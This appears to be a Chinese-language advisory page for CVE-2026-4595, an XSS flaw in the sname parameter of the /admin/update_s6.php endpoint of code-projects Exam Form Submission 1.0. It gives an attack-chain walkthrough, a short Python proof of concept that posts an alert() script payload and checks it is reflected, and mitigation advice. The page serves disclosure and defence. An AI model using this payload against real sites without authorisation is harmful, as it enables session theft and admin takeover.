CVE-2026-4595 CVSS 2.4 低危

CVE-2026-4595 Exam Form Submission跨站脚本漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4595

漏洞类型

跨站脚本攻击 (XSS)

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

code-projects Exam Form Submission 1.0

漏洞概述

该漏洞存在于 code-projects Exam Form Submission 1.0 版本的 /admin/update_s6.php 文件中。由于对参数 sname 缺乏适当的过滤和验证，攻击者可构造恶意 payload 导致跨站脚本攻击。此攻击需远程发起，且需要高权限用户交互，成功利用可能影响系统完整性。

技术细节

漏洞原理在于 /admin/update_s6.php 文件在处理更新操作时，未对用户提交的 sname 参数进行严格的输入清洗和安全输出编码。攻击者可以构造包含恶意 JavaScript 代码的 payload 作为 sname 参数的值提交给服务器。根据 CVSS 向量（PR:H/UI:R），攻击者需要诱导拥有高权限（如管理员）的用户访问特定的 URL 或查看受影响的页面。当管理员浏览器解析响应时，未经过滤的恶意代码将被执行。这属于典型的跨站脚本漏洞，利用该漏洞，攻击者可以窃取管理员的 Cookie、Session ID，甚至以管理员身份执行未授权操作，从而破坏数据的完整性。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标正在使用 code-projects Exam Form Submission 1.0，并确认存在 /admin/update_s6.php 接口。

STEP 2

2. 构造Payload

攻击者编写针对 sname 参数的恶意 JavaScript 代码（如 <script>alert(1)</script>）。

STEP 3

3. 社会工程学/投递

由于需要高权限（PR:H）和用户交互（UI:R），攻击者诱导管理员点击包含恶意 payload 的链接或访问受影响的页面。

STEP 4

4. 执行攻击

管理员浏览器请求页面，服务器返回未经过滤的 sname 参数值，浏览器解析并执行恶意脚本。

STEP 5

5. 达成目的

恶意代码运行，窃取管理员凭证或执行其他恶意操作，破坏系统完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target-ip/admin/update_s6.php"

# Malicious payload to test XSS
payload = "<script>alert('CVE-2026-4595_XSS');</script>"

# Data parameters to be sent
params = {
    "sname": payload
}

try:
    # Send POST request to the vulnerable endpoint
    response = requests.post(url, data=params)

    # Check if the payload is reflected in the response (Vulnerability confirmation)
    if payload in response.text:
        print("[+] Vulnerability confirmed! XSS payload found in response.")
    else:
        print("[-] Vulnerability not detected or payload filtered.")
except Exception as e:
    print(f"Error: {e}")

影响范围

code-projects Exam Form Submission 1.0

防御指南

临时缓解措施

在官方修复补丁发布前，建议限制对 /admin/update_s6.php 的访问权限，仅允许可信IP访问，并部署 Web 应用防火墙（WAF）以拦截常见的 XSS 攻击模式。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4595
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4595
3 Details https://www.cvedetails.com/cve/CVE-2026-4595/
4 VulDB https://vuldb.com/cve/CVE-2026-4595
5 Link https://code-projects.org/
6 Link https://github.com/bybinyu/Vulnerability-Practice/issues/1
7 Link https://vuldb.com/submit/775623
8 Link https://vuldb.com/vuln/352433
9 Link https://vuldb.com/vuln/352433/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表